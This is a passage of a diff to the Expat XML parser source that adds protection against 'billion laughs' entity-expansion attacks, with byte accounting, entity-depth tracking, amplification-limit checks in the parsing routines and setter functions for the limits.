157+ XML_ACCOUNT_ENTITY_EXPANSION, /* intermediate bytes produced during entity
158+ expansion */
159+ XML_ACCOUNT_NONE /* i.e. do not account, was accounted already */
160+};
161+
162+#ifdef XML_DTD
163+typedef unsigned long long XmlBigCount;
164+typedef struct accounting {
165+ XmlBigCount countBytesDirect;
166+ XmlBigCount countBytesIndirect;
167+ int debugLevel;
168+ float maximumAmplificationFactor; // >=1.0
169+ unsigned long long activationThresholdBytes;
170+} ACCOUNTING;
171+
172+typedef struct entity_stats {
173+ unsigned int countEverOpened;
174+ unsigned int currentDepth;
175+ unsigned int maximumDepthSeen;
176+ int debugLevel;
177+} ENTITY_STATS;
178+#endif /* XML_DTD */
179+
180 typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start,
181 const char *end, const char **endPtr);
182
183@@ -403,16 +430,18 @@ static enum XML_Error initializeEncoding(XML_Parser parser);
184 static enum XML_Error doProlog(XML_Parser parser, const ENCODING *enc,
185 const char *s, const char *end, int tok,
186 const char *next, const char **nextPtr,
187- XML_Bool haveMore, XML_Bool allowClosingDoctype);
188+ XML_Bool haveMore, XML_Bool allowClosingDoctype,
189+ enum XML_Account account);
190 static enum XML_Error processInternalEntity(XML_Parser parser, ENTITY *entity,
191 XML_Bool betweenDecl);
192 static enum XML_Error doContent(XML_Parser parser, int startTagLevel,
193 const ENCODING *enc, const char *start,
194 const char *end, const char **endPtr,
195- XML_Bool haveMore);
196+ XML_Bool haveMore, enum XML_Account account);
197 static enum XML_Error doCdataSection(XML_Parser parser, const ENCODING *,
198 const char **startPtr, const char *end,
199- const char **nextPtr, XML_Bool haveMore);
200+ const char **nextPtr, XML_Bool haveMore,
201+ enum XML_Account account);
202 #ifdef XML_DTD
203 static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
204 const char **startPtr, const char *end,
205@@ -422,7 +451,8 @@ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
206 static void freeBindings(XML_Parser parser, BINDING *bindings);
207 static enum XML_Error storeAtts(XML_Parser parser, const ENCODING *,
208 const char *s, TAG_NAME *tagNamePtr,
209- BINDING **bindingsPtr);
210+ BINDING **bindingsPtr,
211+ enum XML_Account account);
212 static enum XML_Error addBinding(XML_Parser parser, PREFIX *prefix,
213 const ATTRIBUTE_ID *attId, const XML_Char *uri,
214 BINDING **bindingsPtr);
215@@ -431,15 +461,18 @@ static int defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *, XML_Bool isCdata,
216 XML_Parser parser);
217 static enum XML_Error storeAttributeValue(XML_Parser parser, const ENCODING *,
218 XML_Bool isCdata, const char *,
219- const char *, STRING_POOL *);
220+ const char *, STRING_POOL *,
221+ enum XML_Account account);
222 static enum XML_Error appendAttributeValue(XML_Parser parser, const ENCODING *,
223 XML_Bool isCdata, const char *,
224- const char *, STRING_POOL *);
225+ const char *, STRING_POOL *,
226+ enum XML_Account account);
227 static ATTRIBUTE_ID *getAttributeId(XML_Parser parser, const ENCODING *enc,
228 const char *start, const char *end);
229 static int setElementTypePrefix(XML_Parser parser, ELEMENT_TYPE *);
230 static enum XML_Error storeEntityValue(XML_Parser parser, const ENCODING *enc,
231- const char *start, const char *end);
232+ const char *start, const char *end,
233+ enum XML_Account account);
234 static int reportProcessingInstruction(XML_Parser parser, const ENCODING *enc,
235 const char *start, const char *end);
236 static int reportComment(XML_Parser parser, const ENCODING *enc,
237@@ -503,6 +536,35 @@ static XML_Parser parserCreate(const XML_Char *encodingName,
238
239 static void parserInit(XML_Parser parser, const XML_Char *encodingName);
240
241+#ifdef XML_DTD
242+static float accountingGetCurrentAmplification(XML_Parser rootParser);
243+static void accountingReportStats(XML_Parser originParser, const char *epilog);
244+static void accountingOnAbort(XML_Parser originParser);
245+static void accountingReportDiff(XML_Parser rootParser,
246+ unsigned int levelsAwayFromRootParser,
247+ const char *before, const char *after,
248+ ptrdiff_t bytesMore, int source_line,
249+ enum XML_Account account);
250+static XML_Bool accountingDiffTolerated(XML_Parser originParser, int tok,
251+ const char *before, const char *after,
252+ int source_line,
253+ enum XML_Account account);
254+
255+static void entityTrackingReportStats(XML_Parser parser, ENTITY *entity,
256+ const char *action, int sourceLine);
257+static void entityTrackingOnOpen(XML_Parser parser, ENTITY *entity,
258+ int sourceLine);
259+static void entityTrackingOnClose(XML_Parser parser, ENTITY *entity,
260+ int sourceLine);
261+
262+static XML_Parser getRootParserOf(XML_Parser parser,
263+ unsigned int *outLevelDiff);
264+static const char *unsignedCharToPrintable(unsigned char c);
265+#endif /* XML_DTD */
266+
267+static unsigned long getDebugLevel(const char *variableName,
268+ unsigned long defaultDebugLevel);
269+
270 #define poolStart(pool) ((pool)->start)
271 #define poolEnd(pool) ((pool)->ptr)
272 #define poolLength(pool) ((pool)->ptr - (pool)->start)
273@@ -616,6 +678,10 @@ struct XML_ParserStruct {
274 enum XML_ParamEntityParsing m_paramEntityParsing;
275 #endif
276 unsigned long m_hash_secret_salt;
277+#ifdef XML_DTD
278+ ACCOUNTING m_accounting;
279+ ENTITY_STATS m_entity_stats;
280+#endif
281 };
282
283 #define MALLOC(parser, s) (parser->m_mem.malloc_fcn((s)))
284@@ -1055,6 +1121,18 @@ parserInit(XML_Parser parser, const XML_Char *encodingName) {
285 parser->m_paramEntityParsing = XML_PARAM_ENTITY_PARSING_NEVER;
286 #endif
287 parser->m_hash_secret_salt = 0;
288+
289+#ifdef XML_DTD
290+ memset(&parser->m_accounting, 0, sizeof(ACCOUNTING));
291+ parser->m_accounting.debugLevel = getDebugLevel("EXPAT_ACCOUNTING_DEBUG", 0u);
292+ parser->m_accounting.maximumAmplificationFactor
293+ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT;
294+ parser->m_accounting.activationThresholdBytes
295+ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT;
296+
297+ memset(&parser->m_entity_stats, 0, sizeof(ENTITY_STATS));
298+ parser->m_entity_stats.debugLevel = getDebugLevel("EXPAT_ENTITY_DEBUG", 0u);
299+#endif
300 }
301
302 /* moves list of bindings to m_freeBindingList */
303@@ -2318,6 +2396,10 @@ XML_ErrorString(enum XML_Error code) {
304 /* Added in 2.2.5. */
305 case XML_ERROR_INVALID_ARGUMENT: /* Constant added in 2.2.1, already */
306 return XML_L("invalid argument");
307+ /* Added in 2.4.0. */
308+ case XML_ERROR_AMPLIFICATION_LIMIT_BREACH:
309+ return XML_L(
310+ "limit on input amplification factor (from DTD and entities) breached");
311 }
312 return NULL;
313 }
314@@ -2354,41 +2436,75 @@ XML_ExpatVersionInfo(void) {
315
316 const XML_Feature *XMLCALL
317 XML_GetFeatureList(void) {
318- static const XML_Feature features[]
319- = {{XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
320- sizeof(XML_Char)},
321- {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
322- sizeof(XML_LChar)},
323+ static const XML_Feature features[] = {
324+ {XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
325+ sizeof(XML_Char)},
326+ {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
327+ sizeof(XML_LChar)},
328 #ifdef XML_UNICODE
329- {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
330+ {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
331 #endif
332 #ifdef XML_UNICODE_WCHAR_T
333- {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
334+ {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
335 #endif
336 #ifdef XML_DTD
337- {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
338+ {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
339 #endif
340 #ifdef XML_CONTEXT_BYTES
341- {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
342- XML_CONTEXT_BYTES},
343+ {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
344+ XML_CONTEXT_BYTES},
345 #endif
346 #ifdef XML_MIN_SIZE
347- {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
348+ {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
349 #endif
350 #ifdef XML_NS
351- {XML_FEATURE_NS, XML_L("XML_NS"), 0},
352+ {XML_FEATURE_NS, XML_L("XML_NS"), 0},
353 #endif
354 #ifdef XML_LARGE_SIZE
355- {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
356+ {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
357 #endif
358 #ifdef XML_ATTR_INFO
359- {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
360+ {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
361 #endif
362- {XML_FEATURE_END, NULL, 0}};
363+#ifdef XML_DTD
364+ /* Added in Expat 2.4.0. */
365+ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
366+ XML_L("XML_BLAP_MAX_AMP"),
367+ (long int)
368+ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT},
369+ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT,
370+ XML_L("XML_BLAP_ACT_THRES"),
371+ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT},
372+#endif
373+ {XML_FEATURE_END, NULL, 0}};
374
375 return features;
376 }
377
378+#ifdef XML_DTD
379+XML_Bool XMLCALL
380+XML_SetBillionLaughsAttackProtectionMaximumAmplification(
381+ XML_Parser parser, float maximumAmplificationFactor) {
382+ if ((parser == NULL) || (parser->m_parentParser != NULL)
383+ || isnan(maximumAmplificationFactor)
384+ || (maximumAmplificationFactor < 1.0f)) {
385+ return XML_FALSE;
386+ }
387+ parser->m_accounting.maximumAmplificationFactor = maximumAmplificationFactor;
388+ return XML_TRUE;
389+}
390+
391+XML_Bool XMLCALL
392+XML_SetBillionLaughsAttackProtectionActivationThreshold(
393+ XML_Parser parser, unsigned long long activationThresholdBytes) {
394+ if ((parser == NULL) || (parser->m_parentParser != NULL)) {
395+ return XML_FALSE;
396+ }
397+ parser->m_accounting.activationThresholdBytes = activationThresholdBytes;
398+ return XML_TRUE;
399+}
400+#endif /* XML_DTD */
401+
402 /* Initially tag->rawName always points into the parse buffer;
403 for those TAG instances opened while the current parse buffer was
404 processed, and not yet closed, we need to store tag->rawName in a more
405@@ -2441,9 +2557,9 @@ storeRawNames(XML_Parser parser) {
406 static enum XML_Error PTRCALL
407 contentProcessor(XML_Parser parser, const char *start, const char *end,
408 const char **endPtr) {
409- enum XML_Error result
410- = doContent(parser, 0, parser->m_encoding, start, end, endPtr,
411- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
412+ enum XML_Error result = doContent(
413+ parser, 0, parser->m_encoding, start, end, endPtr,
414+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
415 if (result == XML_ERROR_NONE) {
416 if (! storeRawNames(parser))
417 return XML_ERROR_NO_MEMORY;
418@@ -2468,6 +2584,14 @@ externalEntityInitProcessor2(XML_Parser parser, const char *start,
419 int tok = XmlContentTok(parser->m_encoding, start, end, &next);
420 switch (tok) {
421 case XML_TOK_BOM:
422+#ifdef XML_DTD
423+ if (! accountingDiffTolerated(parser, tok, start, next, __LINE__,
424+ XML_ACCOUNT_DIRECT)) {
425+ accountingOnAbort(parser);
426+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
427+ }
428+#endif /* XML_DTD */
429+
430 /* If we are at the end of the buffer, this would cause the next stage,
431 i.e. externalEntityInitProcessor3, to pass control directly to
432 doContent (by detecting XML_TOK_NONE) without processing any xml text
433@@ -2505,6 +2629,10 @@ externalEntityInitProcessor3(XML_Parser parser, const char *start,
434 const char *next = start; /* XmlContentTok doesn't always set the last arg */
435 parser->m_eventPtr = start;
436 tok = XmlContentTok(parser->m_encoding, start, end, &next);
437+ /* Note: These bytes are accounted later in:
438+ - processXmlDecl
439+ - externalEntityContentProcessor
440+ */
441 parser->m_eventEndPtr = next;
442
443 switch (tok) {
444@@ -2546,7 +2674,8 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
445 const char *end, const char **endPtr) {
446 enum XML_Error result
447 = doContent(parser, 1, parser->m_encoding, start, end, endPtr,
448- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
449+ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
450+ XML_ACCOUNT_ENTITY_EXPANSION);
451 if (result == XML_ERROR_NONE) {
452 if (! storeRawNames(parser))
453 return XML_ERROR_NO_MEMORY;
454@@ -2557,7 +2686,7 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
455 static enum XML_Error
456 doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
457 const char *s, const char *end, const char **nextPtr,
458- XML_Bool haveMore) {
459+ XML_Bool haveMore, enum XML_Account account) {
460 /* save one level of indirection */
461 DTD *const dtd = parser->m_dtd;
462
463@@ -2575,6 +2704,17 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
464 for (;;) {
465 const char *next = s; /* XmlContentTok doesn't always set the last arg */
466 int tok = XmlContentTok(enc, s, end, &next);
467+#ifdef XML_DTD
468+ const char *accountAfter
469+ = ((tok == XML_TOK_TRAILING_RSQB) || (tok == XML_TOK_TRAILING_CR))
470+ ? (haveMore ? s /* i.e. 0 bytes */ : end)
471+ : next;
472+ if (! accountingDiffTolerated(parser, tok, s, accountAfter, __LINE__,
473+ account)) {
474+ accountingOnAbort(parser);
475+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
476+ }
477+#endif
478 *eventEndPP = next;
479 switch (tok) {
480 case XML_TOK_TRAILING_CR:
481@@ -2630,6 +2770,14 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
482 XML_Char ch = (XML_Char)XmlPredefinedEntityName(
483 enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
484 if (ch) {
485+#ifdef XML_DTD
486+ /* NOTE: We are replacing 4-6 characters original input for 1 character
487+ * so there is no amplification and hence recording without
488+ * protection. */
489+ accountingDiffTolerated(parser, tok, (char *)&ch,
490+ ((char *)&ch) + sizeof(XML_Char), __LINE__,
491+ XML_ACCOUNT_ENTITY_EXPANSION);
492+#endif /* XML_DTD */
493 if (parser->m_characterDataHandler)
494 parser->m_characterDataHandler(parser->m_handlerArg, &ch, 1);
495 else if (parser->m_defaultHandler)
496@@ -2748,7 +2896,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
497 }
498 tag->name.str = (XML_Char *)tag->buf;
499 *toPtr = XML_T('\0');
500- result = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings));
501+ result
502+ = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings), account);
503 if (result)
504 return result;
505 if (parser->m_startElementHandler)
506@@ -2772,7 +2921,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
507 if (! name.str)
508 return XML_ERROR_NO_MEMORY;
509 poolFinish(&parser->m_tempPool);
510- result = storeAtts(parser, enc, s, &name, &bindings);
511+ result = storeAtts(parser, enc, s, &name, &bindings,
512+ XML_ACCOUNT_NONE /* token spans whole start tag */);
513 if (result != XML_ERROR_NONE) {
514 freeBindings(parser, bindings);
515 return result;
516@@ -2907,7 +3057,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
517 /* END disabled code */
518 else if (parser->m_defaultHandler)
519 reportDefault(parser, enc, s, next);
520- result = doCdataSection(parser, enc, &next, end, nextPtr, haveMore);
521+ result
522+ = doCdataSection(parser, enc, &next, end, nextPtr, haveMore, account);
523 if (result != XML_ERROR_NONE)
524 return result;
525 else if (! next) {
526@@ -3036,7 +3187,8 @@ freeBindings(XML_Parser parser, BINDING *bindings) {
527 */
528 static enum XML_Error
529 storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
530- TAG_NAME *tagNamePtr, BINDING **bindingsPtr) {
531+ TAG_NAME *tagNamePtr, BINDING **bindingsPtr,
532+ enum XML_Account account) {
533 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
534 ELEMENT_TYPE *elementType;
535 int nDefaultAtts;
536@@ -3146,7 +3298,7 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
537 /* normalize the attribute value */
538 result = storeAttributeValue(
539 parser, enc, isCdata, parser->m_atts[i].valuePtr,
540- parser->m_atts[i].valueEnd, &parser->m_tempPool);
541+ parser->m_atts[i].valueEnd, &parser->m_tempPool, account);
542 if (result)
543 return result;
544 appAtts[attIndex] = poolStart(&parser->m_tempPool);
545@@ -3535,9 +3687,9 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
546 static enum XML_Error PTRCALL
547 cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
548 const char **endPtr) {
549- enum XML_Error result
550- = doCdataSection(parser, parser->m_encoding, &start, end, endPtr,
551- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
552+ enum XML_Error result = doCdataSection(
553+ parser, parser->m_encoding, &start, end, endPtr,
554+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
555 if (result != XML_ERROR_NONE)
556 return result;
557 if (start) {
558@@ -3557,7 +3709,8 @@ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
559 */
560 static enum XML_Error
561 doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
562- const char *end, const char **nextPtr, XML_Bool haveMore) {
563+ const char *end, const char **nextPtr, XML_Bool haveMore,
564+ enum XML_Account account) {
565 const char *s = *startPtr;
566 const char **eventPP;
567 const char **eventEndPP;
568@@ -3575,6 +3728,14 @@ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
569 for (;;) {
570 const char *next;
571 int tok = XmlCdataSectionTok(enc, s, end, &next);
572+#ifdef XML_DTD
573+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
574+ accountingOnAbort(parser);
575+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
576+ }
577+#else
578+ UNUSED_P(account);
579+#endif
580 *eventEndPP = next;
581 switch (tok) {
582 case XML_TOK_CDATA_SECT_CLOSE:
583@@ -3719,6 +3880,13 @@ doIgnoreSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
584 *eventPP = s;
585 *startPtr = NULL;
586 tok = XmlIgnoreSectionTok(enc, s, end, &next);
587+# ifdef XML_DTD
588+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
589+ XML_ACCOUNT_DIRECT)) {
590+ accountingOnAbort(parser);
591+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
592+ }
593+# endif
594 *eventEndPP = next;
595 switch (tok) {
596 case XML_TOK_IGNORE_SECT:
597@@ -3803,6 +3971,15 @@ processXmlDecl(XML_Parser parser, int isGeneralTextEntity, const char *s,
598 const char *versionend;
599 const XML_Char *storedversion = NULL;
600 int standalone = -1;
601+
602+#ifdef XML_DTD
603+ if (! accountingDiffTolerated(parser, XML_TOK_XML_DECL, s, next, __LINE__,
604+ XML_ACCOUNT_DIRECT)) {
605+ accountingOnAbort(parser);
606+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
607+ }
608+#endif
609+
610 if (! (parser->m_ns ? XmlParseXmlDeclNS : XmlParseXmlDecl)(
611 isGeneralTextEntity, parser->m_encoding, s, next, &parser->m_eventPtr,
612 &version, &versionend, &encodingName, &newEncoding, &standalone)) {
613@@ -3952,6 +4129,10 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
614
615 for (;;) {
616 tok = XmlPrologTok(parser->m_encoding, start, end, &next);
617+ /* Note: Except for XML_TOK_BOM below, these bytes are accounted later in:
618+ - storeEntityValue
619+ - processXmlDecl
620+ */
621 parser->m_eventEndPtr = next;
622 if (tok <= 0) {
623 if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
624@@ -3970,7 +4151,8 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
625 break;
626 }
627 /* found end of entity value - can store it now */
628- return storeEntityValue(parser, parser->m_encoding, s, end);
629+ return storeEntityValue(parser, parser->m_encoding, s, end,
630+ XML_ACCOUNT_DIRECT);
631 } else if (tok == XML_TOK_XML_DECL) {
632 enum XML_Error result;
633 result = processXmlDecl(parser, 0, start, next);
634@@ -3997,6 +4179,14 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
635 */
636 else if (tok == XML_TOK_BOM && next == end
637 && ! parser->m_parsingStatus.finalBuffer) {
638+# ifdef XML_DTD
639+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
640+ XML_ACCOUNT_DIRECT)) {
641+ accountingOnAbort(parser);
642+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
643+ }
644+# endif
645+
646 *nextPtr = next;
647 return XML_ERROR_NONE;
648 }
649@@ -4039,16 +4229,24 @@ externalParEntProcessor(XML_Parser parser, const char *s, const char *end,
650 }
651 /* This would cause the next stage, i.e. doProlog to be passed XML_TOK_BOM.
652 However, when parsing an external subset, doProlog will not accept a BOM
653- as valid, and report a syntax error, so we have to skip the BOM
654+ as valid, and report a syntax error, so we have to skip the BOM, and
655+ account for the BOM bytes.
656 */
657 else if (tok == XML_TOK_BOM) {
658+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
659+ XML_ACCOUNT_DIRECT)) {
660+ accountingOnAbort(parser);
661+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
662+ }
663+
664 s = next;
665 tok = XmlPrologTok(parser->m_encoding, s, end, &next);
666 }
667
668 parser->m_processor = prologProcessor;
669 return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
670- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
671+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
672+ XML_ACCOUNT_DIRECT);
673 }
674
675 static enum XML_Error PTRCALL
676@@ -4061,6 +4259,9 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
677
678 for (;;) {
679 tok = XmlPrologTok(enc, start, end, &next);
680+ /* Note: These bytes are accounted later in:
681+ - storeEntityValue
682+ */
683 if (tok <= 0) {
684 if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
685 *nextPtr = s;
686@@ -4078,7 +4279,7 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
687 break;
688 }
689 /* found end of entity value - can store it now */
690- return storeEntityValue(parser, enc, s, end);
691+ return storeEntityValue(parser, enc, s, end, XML_ACCOUNT_DIRECT);
692 }
693 start = next;
694 }
695@@ -4092,13 +4293,14 @@ prologProcessor(XML_Parser parser, const char *s, const char *end,
696 const char *next = s;
697 int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
698 return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
699- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
700+ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
701+ XML_ACCOUNT_DIRECT);
702 }
703
704 static enum XML_Error
705 doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
706 int tok, const char *next, const char **nextPtr, XML_Bool haveMore,
707- XML_Bool allowClosingDoctype) {
708+ XML_Bool allowClosingDoctype, enum XML_Account account) {
709 #ifdef XML_DTD
710 static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'};
711 #endif /* XML_DTD */
712@@ -4125,6 +4327,10 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
713 static const XML_Char enumValueSep[] = {ASCII_PIPE, '\0'};
714 static const XML_Char enumValueStart[] = {ASCII_LPAREN, '\0'};
715
716+#ifndef XML_DTD
717+ UNUSED_P(account);
718+#endif
719+
720 /* save one level of indirection */
721 DTD *const dtd = parser->m_dtd;
722
723@@ -4189,6 +4395,19 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
724 }
725 }
726 role = XmlTokenRole(&parser->m_prologState, tok, s, next, enc);
727+#ifdef XML_DTD
728+ switch (role) {
729+ case XML_ROLE_INSTANCE_START: // bytes accounted in contentProcessor
730+ case XML_ROLE_XML_DECL: // bytes accounted in processXmlDecl
731+ case XML_ROLE_TEXT_DECL: // bytes accounted in processXmlDecl
732+ break;
733+ default:
734+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
735+ accountingOnAbort(parser);
736+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
737+ }
738+ }
739+#endif
740 switch (role) {
741 case XML_ROLE_XML_DECL: {
742 enum XML_Error result = processXmlDecl(parser, 0, s, next);
743@@ -4464,7 +4683,8 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
744 const XML_Char *attVal;
745 enum XML_Error result = storeAttributeValue(
746 parser, enc, parser->m_declAttributeIsCdata,
747- s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool);
748+ s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool,
749+ XML_ACCOUNT_NONE);
750 if (result)
751 return result;
752 attVal = poolStart(&dtd->pool);
753@@ -4497,8 +4717,9 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
754 break;
755 case XML_ROLE_ENTITY_VALUE:
756 if (dtd->keepProcessing) {
757- enum XML_Error result = storeEntityValue(
758- parser, enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
759+ enum XML_Error result
760+ = storeEntityValue(parser, enc, s + enc->minBytesPerChar,
761+ next - enc->minBytesPerChar, XML_ACCOUNT_NONE);
762 if (parser->m_declEntity) {
763 parser->m_declEntity->textPtr = poolStart(&dtd->entityValuePool);
764 parser->m_declEntity->textLen
765@@ -4888,12 +5109,15 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
766 if (parser->m_externalEntityRefHandler) {
767 dtd->paramEntityRead = XML_FALSE;
768 entity->open = XML_TRUE;
769+ entityTrackingOnOpen(parser, entity, __LINE__);
770 if (! parser->m_externalEntityRefHandler(
771 parser->m_externalEntityRefHandlerArg, 0, entity->base,
772 entity->systemId, entity->publicId)) {
773+ entityTrackingOnClose(parser, entity, __LINE__);
774 entity->open = XML_FALSE;
775 return XML_ERROR_EXTERNAL_ENTITY_HANDLING;
776 }
777+ entityTrackingOnClose(parser, entity, __LINE__);
778 entity->open = XML_FALSE;
779 handleDefault = XML_FALSE;
780 if (! dtd->paramEntityRead) {
781@@ -5091,6 +5315,13 @@ epilogProcessor(XML_Parser parser, const char *s, const char *end,
782 for (;;) {
783 const char *next = NULL;
784 int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
785+#ifdef XML_DTD
786+ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
787+ XML_ACCOUNT_DIRECT)) {
788+ accountingOnAbort(parser);
789+ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
790+ }
791+#endif
792 parser->m_eventEndPtr = next;
793 switch (tok) {
794 /* report partial linebreak - it might be the last token */
795@@ -5164,6 +5395,9 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
796 return XML_ERROR_NO_MEMORY;
797 }
798 entity->open = XML_TRUE;
799+#ifdef XML_DTD
800+ entityTrackingOnOpen(parser, entity, __LINE__);
801+#endif
802 entity->processed = 0;
803 openEntity->next = parser->m_openInternalEntities;
804 parser->m_openInternalEntities = openEntity;
805@@ -5182,17 +5416,22 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
806 int tok
807 = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
808 result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
809- tok, next, &next, XML_FALSE, XML_FALSE);
810+ tok, next, &next, XML_FALSE, XML_FALSE,
811+ XML_ACCOUNT_ENTITY_EXPANSION);
812 } else
813 #endif /* XML_DTD */
814 result = doContent(parser, parser->m_tagLevel, parser->m_internalEncoding,
815- textStart, textEnd, &next, XML_FALSE);
816+ textStart, textEnd, &next, XML_FALSE,
817+ XML_ACCOUNT_ENTITY_EXPANSION);
818
819 if (result == XML_ERROR_NONE) {
820 if (textEnd != next && parser->m_parsingStatus.parsing == XML_SUSPENDED) {
821 entity->processed = (int)(next - textStart);
822 parser->m_processor = internalEntityProcessor;
823 } else {
824+#ifdef XML_DTD
825+ entityTrackingOnClose(parser, entity, __LINE__);
826+#endif /* XML_DTD */
827 entity->open = XML_FALSE;
828 parser->m_openInternalEntities = openEntity->next;
829 /* put openEntity back in list of free instances */
830@@ -5225,12 +5464,13 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
831 int tok
832 = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
833 result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
834- tok, next, &next, XML_FALSE, XML_TRUE);
835+ tok, next, &next, XML_FALSE, XML_TRUE,
836+ XML_ACCOUNT_ENTITY_EXPANSION);
837 } else
838 #endif /* XML_DTD */
839 result = doContent(parser, openEntity->startTagLevel,
840 parser->m_internalEncoding, textStart, textEnd, &next,
841- XML_FALSE);
